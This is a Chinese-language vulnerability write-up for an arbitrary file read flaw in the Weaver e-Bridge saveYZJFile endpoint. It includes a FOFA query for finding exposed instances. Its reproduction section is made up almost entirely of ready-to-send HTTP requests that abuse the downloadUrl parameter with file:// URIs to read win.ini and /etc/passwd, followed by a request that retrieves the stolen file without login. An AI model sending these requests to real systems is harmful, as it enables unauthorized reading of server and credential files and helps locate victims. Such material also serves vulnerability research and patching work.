泛微云桥e-Bridge saveYZJFile存在任意文件读取漏洞
一、漏洞简介
泛微云桥e-Bridge 是一款办公自动化工具,主要提供文档管理、流程管理、协同办公、知识管理和移动办公等功能。它的目标是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。泛微云桥e-Bridge saveYZJFile存在任意文件读取漏洞,通过此漏洞攻击者可获取敏感数据。
二、影响版本
- 泛微云桥e-Bridge
三、资产测绘
- fofa
app="泛微-云桥e-Bridge" - 特征
四、漏洞复现
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/windows/win.ini&fileExt=txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: EBRIDGE_JSESSIONID=96705E17ECBDB493A85BD8977373ABC8
Upgrade-Insecure-Requests: 1GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: EBRIDGE_JSESSIONID=96705E17ECBDB493A85BD8977373ABC8
Upgrade-Insecure-Requests: 1
<font style="color:rgba(0, 0, 0, 0.9);">调用查看文件接口直接读取该文件的内容,替换回显中的id值</font>
GET /file/fileNoLogin/7d9c1faf492b406889e30363dce96dd6 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: EBRIDGE_JSESSIONID=96705E17ECBDB493A85BD8977373ABC8
Upgrade-Insecure-Requests: 1